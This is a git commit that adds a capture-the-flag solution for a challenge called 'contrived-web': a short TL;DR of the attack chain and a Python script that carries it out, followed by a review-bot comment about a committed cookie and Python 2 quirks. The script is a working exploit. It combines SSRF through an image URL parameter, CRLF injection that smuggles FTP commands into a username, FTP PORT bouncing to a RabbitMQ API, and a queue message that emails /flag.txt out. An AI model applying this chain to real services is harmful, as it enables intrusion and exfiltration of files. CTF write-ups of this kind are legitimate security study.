
Commit c39862f

committed
Added contrived-web
1 parent 5318171 commit c39862f


2 files changed

+62
-0
lines changed

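--- /dev/null
+++ b/FILE1_PATH_NOT_SHOWN
@@ -0,0 +1,11 @@
+# Contrived-Web
+
+### TL;DR
+
+- SSRF in the /api/image to ftp server
+- CRLF injection in the username to inject ftp commands
+- Upload file into the ftp server using profile picture upload
+- Use PORT ftp command to SSRF to rabbitmq http API (use REST to discard the png header from the uploaded file)
+- Inject in rabbitmq email queue with an "attachment" parameter to get it to email us the flag
+
+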
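--- /dev/null
+++ b/FILE2_PATH_NOT_SHOWN
@@ -0,0 +1,51 @@
+import requests
+import base64
+import urllib
+
+#Joint effort by mementomori and Jazzy
+
+API_URL = 'http://contrived.pwni.ng/api'
+AUTH = 'e8d880e6-9b42-40e9-8b11-bc79fd6c083c'
+
+SSRF_HOST, SSRF_PORT = '172.32.56.72', 15672
+SSRF_BODY = '''POST /api/exchanges/%2F/amq.default/publish HTTP/1.1
+Host: rabbit:15672
+Authorization: Basic dGVzdDp0ZXN0
+User-Agent: curl/7.52.1
+Accept: */*
+Content-Length: 336
+Content-Type: application/json
+
+{"vhost": "/", "name": "amq.default", "properties": {"delivery_mode": 1, "headers": {}}, "routing_key": "email", "delivery_mode": "1", "payload": "{\\"text\\": \\"pepega\\", \\"to\\": \\"[email protected]\\", \\"attachments\\": [{\\"filename\\": \\"flag.txt\\", \\"path\\": \\"/flag.txt\\"}]}", "headers": {}, "props": {}, "payload_encoding": "string"}
+
+'''.replace('\n', '\r\n')*800
+
+PNG_HEADER = '\x89\x50\x4e\x47'
+
+s = requests.Session()
+s.cookies.update({'authentication': AUTH})
+
+def upload_avatar(contents):
+    r = s.post(API_URL + '/profile', json = {'image': base64.b64encode(contents)})
+    assert r.content == 'Profile updated'
+
+def get_uuid():
+    upload_avatar(PNG_HEADER)
+    r = s.get(API_URL + '/self')
+    return r.json()['profile'].split('/')[4]
+
+def do_ssrf(host, port, body):
+    uuid = get_uuid()
+    upload_avatar(PNG_HEADER + body)
+    print uuid
+    ftp_cmds = [
+        'PORT {},{},{}'.format(host.replace('.', ','), port >> 8, port & 0xff),
+        'CWD user',
+        'CWD {}'.format(uuid),
+        'REST 4',
+        'RETR profile.png',
+    ]
+    url = 'ftp://anonymous%0d%0a{}:pass@ftp/'.format(urllib.quote('\r\n'.join(ftp_cmds)))
+    r = requests.get(API_URL + '/image?url=' + urllib.quote(url))
+
+do_ssrf(SSRF_HOST, SSRF_PORT, SSRF_BODY)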
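Review bot: A live session cookie is committed in plain text at line 8 (`AUTH = '...'`), and it will remain in the repository history even after the account is rotated; read it from the environment instead, e.g. `AUTH = os.environ['CONTRIVED_AUTH']` with `import os` added to the import block. The file is also Python 2 only without saying so: `print uuid` at line 40 is a syntax error on Python 3, `urllib.quote` at lines 48–49 does not exist there, and `base64.b64encode(contents)` at line 29 would return bytes that the `json=` argument cannot serialize; a header comment such as `# Python 2 only: print statement, urllib.quote, str payloads` would spare the next reader a failed run. The `assert` at line 30 is the only success check and is stripped under `-O`, so `if r.content != 'Profile updated': raise RuntimeError(r.content)` is the safer form. The response bound to `r` at line 49 is never read and no status code is checked, so a rejected request is indistinguishable from a successful one.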
